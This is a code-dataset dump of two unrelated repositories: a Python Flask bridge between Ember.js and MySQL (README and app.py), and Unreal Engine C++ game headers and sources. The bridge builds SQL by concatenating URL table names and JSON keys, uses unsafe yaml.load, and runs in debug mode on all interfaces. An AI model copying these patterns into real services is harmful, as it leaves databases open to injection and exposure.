4421a16c54808086dbb3e880c4289efbaa881aa3
refs/heads/master
2020-12-21T23:37:53.982492
2020-01-27T22:12:52
2020-01-27T22:12:52
236,602,190
0
0
null
2020-01-27T21:45:59
2019-12-30T13:40:32
2017-02-23T13:43:09
null
[ { "alpha_fraction": 0.6946220397949219, "alphanum_fraction": 0.7032719254493713, "avg_line_length": 28.87640380859375, "blob_id": "36eb7551e898e5a140828654cf8c9be39d9314bb", "content_id": "0e377522110a1342e07f45723683de1c1ad3e54b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2659, "license_type": "no_license", "max_line_length": 80, "num_lines": 89, "path": "/README.md", "repo_name": "BruceJL/mysql-json-bridge", "src_encoding": "UTF-8", "text": "mysql-json-bridge\n=================\nThis is a fork of the mysql-json-bridge as found at:\nhttp://github.com/rackerhacker/mysql-json-bridge. It has been changed such that\nit acts as a RESTful bridge between an Ember.js client and a MariaDB (née\nMySQL) database.\n\nIt has been updated from the source to Python 3 and to support the default\nEmber.js RESTAdapter.\n\nInstallation & Startup\n----------------------\nInstall a few prerequisites:\n\n The Debian packages required to run this software are as follows:\n python3\n python3-flask\n python3-pretty-yaml\n python3-jsonpickle\n python3-pymysql\n python3-inflect\n python3-dateutil\n python3-flask-cors\n\nGet the source:\n\n git clone http://github.com/BruceJL/mysql-json-bridge\n cd mysql-json-bridge\n python app.py\n\nConfiguration\n-------------\nMake a conf.d directory with separate database configuration files:\n\n # conf.d/database1.yaml\n ---\n identifier: 'prod.database1'\n scheme: 'mysql'\n username: 'database1'\n password: 'secret_password'\n database: 'database1'\n hostname: 'database1.domain.com'\n enabled: 'True'\n\n # conf.d/database2.yaml\n ---\n identifier: 'staging.database2'\n scheme: 'mysql'\n username: 'database2'\n password: 'secret_password'\n database: 'database2'\n hostname: 'database2.domain.com'\n enabled: 'True'\n\nUsage\n-----\nTo issue a query to the bridge, simply make an HTTP POST to the appropriate URL.\nYour URL should be something like this:\n\n http://localhost:5000/<database>/<table>\n\nThis will pull all entries for that table.\n\nAn example wsgi file for use with a web server is supplied as wsgi.py. It seems\nto run well using gunicorn.\n\n*IMPORTANT* security considerations\n-----------------------------------\n**The base mysql-json-bridge server doesn't do any query filtering nor does it\ndo any authentication. You'd need to configure that yourself within your web\nserver.**\n\nAlso, be very careful with the users you configure in your `conf.d` YAML files.\nIf the user has write access to your database, people could issue UPDATE and\nDELETE statements through the bridge.\n\nIf you create read-only MySQL users for the bridge to use, **ensure that those\nusers have read access *only* to the databases that you specify.** Giving\nglobal read access to a user allows them to read your `mysql.user` table which\ncontains hashed passwords. *This could lead to a very bad experience.*\n\nGot improvements? 
Found a bug?\n-------------------------------\nIssue a pull request or open an issue in GitHub.\nI appreciate and welcome all feedback you have!\n\nTip of the hat\n--------------------\nBig tip of the hat to major for the material to make the fork.\n" }, { "alpha_fraction": 0.590452253818512, "alphanum_fraction": 0.5957465767860413, "avg_line_length": 29.615385055541992, "blob_id": "e4743ad67959faed0a4bfc9a5c435378cd9143bf", "content_id": "3edd5f14c7e0fea63212849fa4b1977109db7fcb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11144, "license_type": "no_license", "max_line_length": 110, "num_lines": 364, "path": "/app.py", "repo_name": "BruceJL/mysql-json-bridge", "src_encoding": "UTF-8", "text": "#!/usr/bin/python3\n#\n# Copyright 2012 Major Hayden\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\"\"\"MySQL <-> JSON bridge <-> Ember.js\"\"\"\n\nimport datetime\nimport decimal\nimport json\nimport logging\nimport os\nimport sys\nimport yaml\nimport inflect\nimport pymysql\nimport threading\nimport re\n\nfrom dateutil import parser\nfrom flask import Flask, Response, abort, request, current_app\nfrom functools import wraps, update_wrapper\nfrom urllib.parse import urlparse, urlunparse\nfrom flask_cors import CORS, cross_origin\n\napp = Flask(__name__)\nCORS(app)\napp.logger.setLevel(logging.INFO)\napp.debug = True\ndbs = {}\n\ninflection = inflect.engine()\nsql_condition = threading.Condition()\n\n# Helps us find non-python files installed by setuptools\ndef data_file(fname):\n \"\"\"Return the path to a data file of ours.\"\"\"\n return os.path.join(os.path.split(__file__)[0], fname)\n\nif not app.debug:\n logyaml = \"\"\n with open(data_file('config/log.yml'), 'r') as f:\n logyaml = yaml.load(f)\n try:\n formatter = logging.Formatter('%(asctime)s - %(message)s')\n if logyaml['type'] == \"file\":\n from logging.handlers import RotatingFileHandler\n file_handler = RotatingFileHandler(\n logyaml['logfile'], backupCount=logyaml['backupCount'])\n file_handler.setLevel(logging.INFO)\n file_handler.setFormatter(formatter)\n app.logger.addHandler(file_handler)\n elif logyaml['type'] == 'syslog':\n from logging.handlers import SysLogHandler\n syslog_handler = SysLogHandler()\n syslog_handler.setLevel(logging.INFO)\n syslog_handler.setFormatter(formatter)\n app.logger.addHandler(syslog_handler)\n except:\n pass\n\n\n# Decorator to return JSON easily\ndef jsonify(f):\n @wraps(f)\n def inner(*args, **kwargs):\n # Change our datetime columns into strings so we can serialize\n jsonstring = json.dumps(f(*args, **kwargs), default=json_fixup)\n return Response(jsonstring, mimetype='application/json')\n return inner\n\n\ndef json_fixup(obj):\n if isinstance(obj, datetime.datetime):\n return obj.isoformat()\n if isinstance(obj, decimal.Decimal):\n return float(obj)\n else:\n return None\n\n\ndef read_config():\n app.logger.debug(\"entering read_config()\")\n databases = {}\n cfiles = []\n\n cdir = data_file('conf.d/')\n for dirname, dirnames, 
filenames in os.walk(cdir):\n for filename in filenames:\n fullpath = os.path.join(dirname, filename)\n cfiles.append(fullpath)\n\n for cfile in cfiles:\n tmp = {}\n\n if not cfile.endswith('.yaml'):\n continue\n\n fh = open(data_file(cfile), 'r')\n db = yaml.load(fh)\n fh.close()\n\n if db is None:\n continue\n\n if 'identifier' not in db:\n continue\n\n if 'enabled' not in db:\n continue\n\n if db['enabled'] != 'True':\n continue\n\n identifier = db['identifier']\n\n required = ['scheme', 'username', 'password', 'hostname', 'database']\n if not all(param in db for param in required):\n continue\n\n scheme = db['scheme']\n netloc = '%s:%s@%s' % (db['username'], db['password'], db['hostname'])\n path = '/%s' % db['database']\n conn = (scheme, netloc, path, None, None, None)\n connection_string = urlunparse(conn)\n\n tmp[identifier] = connection_string\n databases = dict(databases.items() | tmp.items())\n app.logger.debug(\"Successfully read configuration files\")\n return databases\n\n\n# Pull the database credentials from our YAML file\ndef get_db_creds(database):\n databases = read_config()\n mysql_uri = databases.get(database)\n\n # If the database doesn't exist in the yaml, we're done\n if not mysql_uri:\n return False\n\n # Parse the URL in the .yml file\n try:\n o = urlparse(mysql_uri)\n creds = {\n 'host': o.hostname,\n 'db': o.path[1:],\n 'user': o.username,\n 'passwd': o.password,\n }\n except:\n creds = False\n\n return creds\n\n\ndef setup_db_connection(database):\n if database in dbs.keys():\n db = dbs[database]\n if db.open:\n app.logger.debug(\"Using existing database connection to \" + database)\n return db\n\n creds = get_db_creds(database)\n\n # If we couldn't find corresponding credentials, throw a 404\n if not creds:\n app.logger.error(\"Unable to find credentials for %s.\" % database)\n raise Exception(\"ERROR Unable to find credentials matching %s.\" % database)\n\n # Prepare the database connection\n app.logger.debug(\"Connecting to %s database (%s)\" % (\n database, request.remote_addr))\n db = pymysql.connect(**creds)\n db.autocommit(True)\n\n dbs[database] = db\n #return the database object\n return db\n\n\ndef execute_sql(cursor, database, sql, vars):\n # Attempt to run the query\n app.logger.info(\"%s attempting to run \\\"%s\\\" against %s database with tuple %s\" % (\n request.remote_addr, sql, database, vars))\n try:\n sql_condition.acquire()\n cursor.execute(sql, vars)\n data = cursor.fetchall()\n sql_condition.release()\n app.logger.info(\"returning \" + str(len(data)) + \" results\")\n app.logger.debug(\"results: \" + str(data))\n return data\n\n except pymysql.err.MySQLError as e:\n app.logger.error(\"ERROR\" + str(e.args) + \" When running \" + sql)\n #app.logger.error(\"ERROR\" + \" \".join(str(i) for i in e.args + \"When running \" + sql))\n abort(500)\n except Exception as e:\n app.logger.error(\"query failed: \" + str(e))\n\n\ndef make_name_value_list_string(items):\n updates = []\n vars = ()\n for k, v in items:\n if v is not None:\n if type(v) is str:\n if re.search('^\\d\\d\\d\\d-\\d\\d-\\d\\dT\\d\\d:\\d\\d:\\d\\d\\.\\d\\d\\dZ$', v):\n if \"1970-01-01T00:00:00.000Z\" == v:\n v = datetime.datetime.now().isoformat()\n else:\n v = parser.parse(v)\n v = v.strftime(\"%Y-%m-%d %H:%M:%S\")\n\n updates.append(\"`\" + str(k) + \"`= %s\")\n vars = vars + (v,)\n\n # make the string\n string = ','.join(str(x) for x in updates)\n return (string, vars)\n\n\n# This handles ember style queries\[email protected](\"/<database>/<table>\", 
methods=['GET'])\n@jsonify\ndef do_ember_table(database=None, table=None):\n db = None\n try:\n db = setup_db_connection(database)\n\n table_singular = inflection.singular_noun(table)\n if table_singular != False:\n\n\n cursor = db.cursor(pymysql.cursors.DictCursor)\n\n sql = \"SELECT * from `\" + table_singular + \"`;\"\n results = execute_sql(cursor, database, sql, ())\n return {table : results}\n else:\n abort(404)\n\n except pymysql.err.MySQLError as e:\n app.logger.error(\"Failed to setup database connection: \" + str(e) )\n abort(404)\n\n\n# This method is used to create new entries\[email protected](\"/<database>/<table>\", methods=['POST'])\ndef do_json_table_post(database=None, table=None):\n db = None\n data = None\n json_data = None\n\n app.logger.info(\"Got POST to \" + database + \" table \" + table + \" of \" + str(request.json))\n db = setup_db_connection(database)\n\n table_singular = inflection.singular_noun(table)\n cursor = db.cursor(pymysql.cursors.DictCursor)\n\n (s, vars) = make_name_value_list_string(request.json[table_singular].items())\n\n sql = \"INSERT INTO `\" + table_singular + \\\n \"` SET \" + s + \";\"\n try:\n results = execute_sql(cursor, database, sql, vars)\n\n sql = \"SELECT LAST_INSERT_ID();\"\n results = execute_sql(cursor, database, sql, ())\n\n id = str(results[0]['LAST_INSERT_ID()'])\n\n sql = \"SELECT * FROM `\" + table_singular + \"` WHERE id = %s;\"\n results = execute_sql(cursor, database, sql, (id,))\n result = results[0]\n data = {table: result}\n json_data = json.dumps(data, default=json_fixup)\n app.logger.info(\"json data: \" + str(json_data))\n\n except pymysql.err.MySQLError as e:\n app.logger.error(str(e))\n raise e\n\n finally:\n if json_data is not None:\n return Response(json_data, status=201, mimetype='application/json')\n else:\n abort(500)\n\[email protected](\"/<database>/<table>/<id>\", methods=['GET'])\n@jsonify\ndef do_json_get_table_entry(database=None, table=None, id=None):\n db = None\n data = None\n try:\n db = setup_db_connection(database)\n\n table_singular = inflection.singular_noun(table)\n cursor = db.cursor(pymysql.cursors.DictCursor)\n\n sql = \"SELECT * from `\" + table_singular + \\\n \"` WHERE `id`=%s;\"\n\n results = execute_sql(cursor, database, sql, (id,))\n result = results[0]\n data = {table : result}\n\n if request.args.get('include') is not None:\n include_singular = request.args.get('include')\n include = inflection.plural(include_singular)\n\n sql = \"SELECT * from `\" + include_singular + \\\n \"` WHERE `\" + table_singular + \"`= %s;\"\n include_results = execute_sql(cursor, database, sql, (id,))\n\n include_indexs = []\n for x in include_results:\n include_indexs.append(x['id'])\n\n app.logger.debug(\"include_indexs: \" + str(include_indexs))\n\n result.update({include : include_indexs})\n data = {table : [result], include : include_results}\n\n except pymysql.err.MySQLError as e:\n app.logger.error(\"MySQLError: \" + str(e))\n abort(404)\n finally:\n return data\n\[email protected](\"/<database>/<table>/<id>\", methods=['PUT'])\n@jsonify\ndef do_json_put_table_entry(database=None, table=None, id=None):\n app.logger.info(\"Got PUT to \" + database + \", table \" + table + \", id \" + id + \" of \" + str(request.json))\n\n db = setup_db_connection(database)\n\n table_singular = inflection.singular_noun(table)\n cursor = db.cursor(pymysql.cursors.DictCursor)\n\n app.logger.debug(\"json: \" + str(request.json[table_singular].items()))\n (s, vars) = 
make_name_value_list_string(request.json[table_singular].items())\n\n sql = \"UPDATE `\" + table_singular + \\\n \"` SET \" + \\\n s + \\\n \" WHERE `id`= %s;\"\n results = execute_sql(cursor, database, sql, vars + (id,))\n return Response(\"\", status=200)\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', threaded=True)\n" } ]
2
pkucherov/ProjectGun-wkdtpeo
https://github.com/pkucherov/ProjectGun-wkdtpeo
b3500e170c2c264392c14efacb133a3b15e68c31
d5a771ffdb3caa6a013be67c4391676409d4e90d
54798c512457f7f5bda4973530dda4c217baa608
refs/heads/main
2023-06-24T13:00:25.653918
2021-07-15T01:52:20
2021-07-15T01:52:20
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6342364549636841, "alphanum_fraction": 0.6342364549636841, "avg_line_length": 24.77777862548828, "blob_id": "cdcfc33d2f62b2b1fde154216970df1f174440f5", "content_id": "b9c4ab00fd5c75de320d30d1a85c69c283ea4c6b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1720, "license_type": "no_license", "max_line_length": 95, "num_lines": 63, "path": "/Source/Project_Gun/Public/UI/PG_UserWidgetScreenStageFailed.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"Blueprint/UserWidget.h\"\n\n#include \"PG_UserWidgetScreenStageFailed.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API UPG_UserWidgetScreenStageFailed : public UUserWidget\n{\n\tGENERATED_BODY()\n\nprotected:\n\tvirtual void NativeConstruct() override;\n\npublic:\n\tvirtual void SetVisibility(ESlateVisibility InVisibility) override;\n\npublic :\n\tvoid SetPopupTitle(FString kTitle);\n\n\tUFUNCTION(BlueprintCallable)\n\tbool IsAbleViewStagePlayAD();\n\n\tUFUNCTION(BlueprintCallable)\n\tvoid UpdateLayout();\n\nprotected:\n\t// Popup Title\n\tPG_WIDGET_DECLAR(UTextBlock, TextTitle);\n\n\t// Mission State\n\tPG_WIDGET_DECLAR(UButton, BtnFlag);\n\tPG_WIDGET_DECLAR(UButton, BtnLethal);\n\tPG_WIDGET_DECLAR(UButton, BtnTime);\n\n\t// Menu Button\n\tPG_WIDGET_DECLAR(UButton, BtnHome);\n\tPG_WIDGET_DECLAR(UButton, BtnRetry);\n\n\tUPROPERTY(EditAnywhere, Category = \"PG Sound\")\n\tclass USoundBase* PopupPlaySound = nullptr;\n\nprotected:\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnBtnHome();\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnBtnRetry();\n\n\t//============================================================================================\n\t// 광고 시청에 대한 결과\n\t//============================================================================================\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnADPlayStageVideoSucessed();\t// 스테이지 플레이형 광고를 성공적으로 보았음\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnADPlayStageVideoClosed();\t// 스테이지 플레이형 광고를 닫거나 실패하였음\n\t//============================================================================================\n};\n" }, { "alpha_fraction": 0.7591130137443542, "alphanum_fraction": 0.7621506452560425, "avg_line_length": 27.38793182373047, "blob_id": "f68e86cead0a9cefbaea69c50eb342485a05eae4", "content_id": "de6b902d4eca346e89ad43e0855c69dfddc58b07", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3294, "license_type": "no_license", "max_line_length": 132, "num_lines": 116, "path": "/Source/Project_Gun/Private/Character/Component/PG_ComponentWeapon.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"Character/Component/PG_ComponentWeapon.h\"\n#include \"Character/PG_Char.h\"\n#include \"BlueScriptObject/Weapon/PG_Weapon.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n\n// Sets default values for this component's properties\nUPG_ComponentWeapon::UPG_ComponentWeapon()\n{\n\t// Set this component to be initialized when the game starts, and to be ticked every frame. 
You can turn these features\n\t// off to improve performance if you don't need them.\n\tPrimaryComponentTick.bCanEverTick = false;\n\n\t// ...\n}\n\n\n// Called when the game starts\nvoid UPG_ComponentWeapon::BeginPlay()\n{\n\tSuper::BeginPlay();\n\n\tEquipWeapon(WeaponTableIndex);\n}\n\n// Called every frame\nvoid UPG_ComponentWeapon::TickComponent(float DeltaTime, ELevelTick TickType, FActorComponentTickFunction* ThisTickFunction)\n{\n\tSuper::TickComponent(DeltaTime, TickType, ThisTickFunction);\n\n\t// ...\n}\nbool UPG_ComponentWeapon::EquipWeapon(int32 nWeaponTableIndex)\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, false);\n\n\tauto pWeaponTableData = pGameInstance->GetWeaponTableData(WeaponTableIndex);\n\tABCHECK(nullptr != pWeaponTableData, false);\n\n\tauto Owner = Cast<APG_Char>(GetOwner());\n\tABCHECK(nullptr != Owner, false);\n\n\tAPG_Weapon* NewWeapon = GetWorld()->SpawnActor<APG_Weapon>(pWeaponTableData->BPWeapon, FVector::ZeroVector, FRotator::ZeroRotator);\n\tABCHECK(nullptr != NewWeapon, false);\n\tABCHECK(NewWeapon->SetWeaponData(nWeaponTableIndex), false)\n\n\tif (CurrentWeapon.IsValid(true))\n\t\tUnEquipWeapon();\n\n\tFName MonsterGunSocket(TEXT(\"Bip001-L-GunSocket\"));\n\tNewWeapon->AttachToComponent(Owner->GetMesh(), FAttachmentTransformRules::SnapToTargetNotIncludingScale, MonsterGunSocket);\n\tNewWeapon->SetOwner(Owner);\n\n\tCurrentWeapon = NewWeapon;\n\t\n\treturn true;\n}\n//\n//bool UPG_ComponentWeapon::EquipWeapon(const TSubclassOf<class APG_Weapon>& WeaponType)\n//{\n//\tauto Owner = Cast<APG_Char>(GetOwner());\n//\tABCHECK(nullptr != Owner, false);\n//\n//\tAPG_Weapon* NewWeapon = GetWorld()->SpawnActor<APG_Weapon>(WeaponType, FVector::ZeroVector, FRotator::ZeroRotator);\n//\tABCHECK(nullptr != NewWeapon, false);\n//\n//\tif (CurrentWeapon.IsValid(true))\n//\t\tUnEquipWeapon();\n//\n//\tFName MonsterGunSocket(TEXT(\"Bip001-L-GunSocket\"));\n//\tNewWeapon->AttachToComponent(Owner->GetMesh(), FAttachmentTransformRules::SnapToTargetNotIncludingScale, MonsterGunSocket);\n//\tNewWeapon->SetOwner(Owner);\n//\n//\tCurrentWeapon = NewWeapon;\n//\tCurrentWeapon->SetWeaponData(nWeaponTalbeIndex)\n//\treturn true;\n//}\n\nvoid UPG_ComponentWeapon::UnEquipWeapon()\n{\n\tif (CurrentWeapon.IsValid(true))\n\t{\n\t\tCurrentWeapon->DetachFromActor(FDetachmentTransformRules::KeepWorldTransform);\n\t\tCurrentWeapon->Destroy();\n\t\tCurrentWeapon = nullptr;\n\t}\n}\n\n bool UPG_ComponentWeapon::IsEquipWeapon()\n{\n\t return CurrentWeapon.IsValid(true);\n}\n\nvoid UPG_ComponentWeapon::Fire()\n{\n\tABCHECK(CurrentWeapon.Get());\n\tCurrentWeapon->Fire();\n}\n\nvoid UPG_ComponentWeapon::StopFire()\n{\n\tABCHECK(CurrentWeapon.IsValid(true));\n\tCurrentWeapon->StopFire();\n}\n\nfloat UPG_ComponentWeapon::GetAttackRange()\n{\n\treturn CurrentWeapon.IsValid(true) ? 
CurrentWeapon->GetAttackRange() : 0.0f;\n}\n\nvoid UPG_ComponentWeapon::OnDestroy()\n{\n\tUnEquipWeapon();\n}" }, { "alpha_fraction": 0.7542372941970825, "alphanum_fraction": 0.7542372941970825, "avg_line_length": 20.071428298950195, "blob_id": "ef2ee185f1d566b5529ac76b99dc51126bbfcdb9", "content_id": "bf65223380b28a921a09992a5749669736d52718", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 592, "license_type": "no_license", "max_line_length": 104, "num_lines": 28, "path": "/Source/Project_Gun/Public/Character/PG_MonCharBoss.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"Character/PG_MonChar.h\"\n\n#include \"PG_MonCharBoss.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API APG_MonCharBoss : public APG_MonChar\n{\n\tGENERATED_BODY()\n\t\npublic :\n\tAPG_MonCharBoss();\n\n\tvirtual void BeginPlay() override;\n\tvirtual void PostInitializeComponents() override;\n\nprivate:\n\tUPROPERTY(EditAnywhere, BlueprintReadWrite, Category = MonsterInfo, Meta = (AllowPrivateAccess = true))\n\tstruct FPGMonsterData_Boss MonsterBossData;\n\t\n};\n" }, { "alpha_fraction": 0.6900982856750488, "alphanum_fraction": 0.694633424282074, "avg_line_length": 29.06818199157715, "blob_id": "9fb0428b95cbbe65ffea47d3610de2f9ec57f112", "content_id": "c47d6888be9c5674d05332cd9ca1f709a11cf287", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2792, "license_type": "no_license", "max_line_length": 187, "num_lines": 88, "path": "/Source/Project_Gun/Public/Character/PG_MonChar.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"Character/PG_Char.h\"\n\n#include <GameFramework/Character.h>\n#include \"PG_MonChar.generated.h\"\n\nUCLASS()\nclass PROJECT_GUN_API APG_MonChar : public APG_Char\n{\n\tGENERATED_BODY()\n\npublic:\n\t// Sets default values for this character's properties\n\tAPG_MonChar();\n\nprotected:\n\t// Called when the game starts or when spawned\n\tvirtual void BeginPlay() override;\n\tvirtual void PostInitializeComponents() override;\n\tvirtual void FellOutOfWorld(const class UDamageType & dmgType) override;\n\npublic:\t\n\t// Called every frame\n\tvirtual void Tick(float DeltaTime) override;\n\n\t// Called to bind functionality to input\n\tvirtual void SetupPlayerInputComponent(class UInputComponent* PlayerInputComponent) override;\n\npublic :\n\t//==========================================================\n\t// AI\n\t//==========================================================\n\tbool RunAI();\n\tvoid StopAI();\n\n\t//==========================================================\n\t// Monster Info\n\t//==========================================================\n\tconst FPGMonsterData* GetMonsterData();\n\tvoid SetHP(int32 nHP);\n\tvoid SetDie(bool IsUseLetharAttack);\n\tint32 GetDetectRange() const;\t\t// 몬스터 시야\n\tint32 GetChaseRange() const;\t\t// 몬스터가 쫓아오는 최대 거리\n\tfloat GetHPRatio() const;\t\t\t// 현재 체력 비율\n\tfloat GetMaxHP() const;\t\t\t\t// 최대 체력\n\tfloat GetDropRate() const;\t\t\t// 재화 드랍확율\n\n\nprotected :\n\tvirtual bool SetDefaultMonsterData();\n\tclass APG_MyChar* FindTargetToMyChar();\t// 몬스터 기준에서 타겟팅할 플레이어를 
찾는다.\n\n\tvoid UpdateRotation(float DeltaTime);\n\npublic :\n\tvirtual bool OnDamage(int32 nDamage, bool IsUseLetharAttack = false);\n\nprotected :\n\tvirtual void OnAssetLoadCharacterCompleted() override;\n\tUFUNCTION()\n\tvirtual void OnCharacterHit(UPrimitiveComponent* OverlappedComp, AActor* OtherActor, UPrimitiveComponent* OtherComp, int32 OtherBodyIndex, bool bFromWeep, const FHitResult& SweepResult);\n\tUFUNCTION()\n\tvirtual void OnHitCallback(UPrimitiveComponent* HitComp, AActor* OtherActor, UPrimitiveComponent* OtherComp, FVector NormalImpulse, const FHitResult& Hit);\n\t\nprotected:\n\tUPROPERTY(VisibleInstanceOnly, Category = MonsterComponent)\n\tclass UPG_ComponentCharScale* CharScaleComponent;\n\n\tUPROPERTY()\n\tclass APG_AICon_Mon* AIController;\n\n\tstruct FPGMonsterData* MonsterData = nullptr;\n\nprotected:\n\tbool\t\tm_bDoNotRotation = false;\t\t// 몬스터가 회전하지 않음\n\tbool\t\tm_bDoNotMoving = false;\t\t\t// 몬스터가 이동하지 않음\n\tfloat\t\tm_fCharTargetAngle = 0.0f;\n\tfloat\t\tm_fMaxHP;\n\tFRotator\tm_vTargetRotation = FRotator::ZeroRotator;\n\tFVector\t\tm_vBeginScale;\n\t\nprivate :\n\tvoid DebugOnly();\n};\n" }, { "alpha_fraction": 0.5982532501220703, "alphanum_fraction": 0.6077575087547302, "avg_line_length": 32.8521728515625, "blob_id": "37fc05f90e5d474ac50d9e01d73d4ac697fde54a", "content_id": "3976ac255f80ece519aaf43e8769ff6783cc848b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4161, "license_type": "no_license", "max_line_length": 127, "num_lines": 115, "path": "/Source/Project_Gun/Public/Game/GameMode/PG_GameModeBase.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <GameFramework/GameModeBase.h>\n#include \"PG_GameModeBase.generated.h\"\n\nextern UWorld* G_PGWorld = nullptr;\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API APG_GameModeBase : public AGameModeBase\n{\n\tGENERATED_BODY()\n\t\npublic :\n\tAPG_GameModeBase();\n\tvirtual void PostLoad() override;\n\tvirtual void PostInitializeComponents() override;\n\tvirtual void PostLogin(APlayerController* NewPlayer) override;\n\tvirtual void BeginPlay() override;\n\tvirtual void BeginDestroy() override;\n\tvirtual void Tick(float DeltaTime) override;\n\t\npublic :\n\t//===================================================\n\t// Game\n\t//===================================================\n\tUFUNCTION(BlueprintCallable, Category = \"PG Game\")\n\tbool StartGame();\n\tUFUNCTION(BlueprintCallable, Category = \"PG Game\")\n\tvoid StartGame_NextStage();\n\tUFUNCTION(BlueprintCallable, Category = \"PG Game\")\n\tvoid RestartGame();\n\n\t//===================================================\n\t// Stage\n\t//===================================================\n\t// StageID 관련\n\tUFUNCTION(BlueprintCallable, Category = \"PG Stage\")\n\tbool SetNextStageID();\n\tUFUNCTION(BlueprintCallable, Category = \"PG Stage\")\n\tbool SetPrevStageID();\n\tUFUNCTION(BlueprintCallable, Category = \"PG Stage\")\n\tbool SetPlayStageID(int32 nPlayStageID);\n\tUFUNCTION(BlueprintCallable, Category = \"PG Stage\")\n\tint32 GetPlayStageID() { return m_nPalyStageID; }\n\n\t// SaveStageData\n\tUFUNCTION(BlueprintCallable, Category = \"PG Stage\")\n\tbool SetSelectSaveStageData(int32 a_nStageID);\t\t// m_pSelectSaveStageData 데이터를 설정한다.\n\tUFUNCTION(BlueprintCallable, Category = \"PG Stage\")\n\tbool IsFirstPlayStage(int32 
a_nStageID);\t\t\t// 해당 스테이지를 처음 플레이하는지 검사한다.\n\n\t//===================================================\n\t// Mission\n\t//===================================================\n\tvirtual bool IsClearMission(EStageClearType a_ekStageClearType) { return false; }\t// 각각의 GameMode에 따라 IsClearMission 검사 조건이 틀림\n\n\t//===================================================\n\t// WeaponShop\n\t//===================================================\n\t// 무기 언락\n\tbool IsUnlockWeapon(int32 a_nWeaponIndex);\n\tbool IsMaxLevelPower(int32 a_nWeaponIndex);\n\tbool IsMaxLevelAmmo(int32 a_nWeaponIndex);\n\tbool IsAbleBuyRewardPointPower(int32 a_nWeaponIndex);\n\tbool IsAbleBuyRewardPointAmmo(int32 a_nWeaponIndex);\n\n\t// 무기 구매\n\tbool BuyWeapon(int32 a_nWeaponIndex);\n\tbool BuyPowerUp(int32 a_nWeaponIndex);\n\tbool BuyAmmoUp(int32 a_nWeaponIndex);\n\tFString GetLastBuyErrorMsg();\n\n\t// 무기 정보\n\tint32 GetMaxPower(int32 a_nWeaponIndex);\n\tint32 GetMaxAmmo(int32 a_nWeaponIndex);\n\n\t//===================================================\n\t// Save Data\n\t//===================================================\n\tclass UPG_SavePlayerData*\tGetSavePlayerData()\t\t\t{ return m_pSavePlayerData; }\n\tclass UPG_SaveStageData*\tGetSelectedSaveStageData()\t{ return m_pSelectSaveStageData; }\n\t// 저장\n\tvirtual bool SavePlayerData();\t\t// m_pSavePlayerData에 쓰여진 플레이어 데이터를 저장한다\n\tvirtual bool SaveStageData();\t\t// m_pSelectSaveStageData에 쓰여진 스테이지 플레이 데이터를 저장한다\n\nprivate:\n\t//==========================================================\n\t// SavePlayerData (플레이어 저장 데이터)\n\t//==========================================================\n\tclass UPG_SavePlayerData*\tLoadSavePlayerData();\n\n\t//==========================================================\n\t// SaveStageData (스테이지 저장 데이터)\n\t//==========================================================\n\tclass UPG_SaveStageData*\tLoadSaveStageData(int32 nStageID);\n\nprivate:\n\tvoid UpdateGameInstance(float DeltaTime);\n\nprotected :\n\tUPROPERTY()\n\tclass UPG_SavePlayerData*\tm_pSavePlayerData = nullptr;\t\t\t// 저장된 유저 데이터\n\tUPROPERTY()\n\tclass UPG_SaveStageData*\tm_pSelectSaveStageData = nullptr;\t\t// 저장된 스테이지 데이터\n\tUPROPERTY()\n\tFString m_kLastBuyErrorMsg;\n\tUPROPERTY()\n\tint32 m_nPalyStageID = 0;\t// 현재 스테이지ID\n};\n" }, { "alpha_fraction": 0.718324601650238, "alphanum_fraction": 0.7204188704490662, "avg_line_length": 19.340425491333008, "blob_id": "d9c0dad5fc72a10542532ce16c063408d5ef659a", "content_id": "cb319b0f53a49f6f77fa0e95d64514a61777fb2f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 957, "license_type": "no_license", "max_line_length": 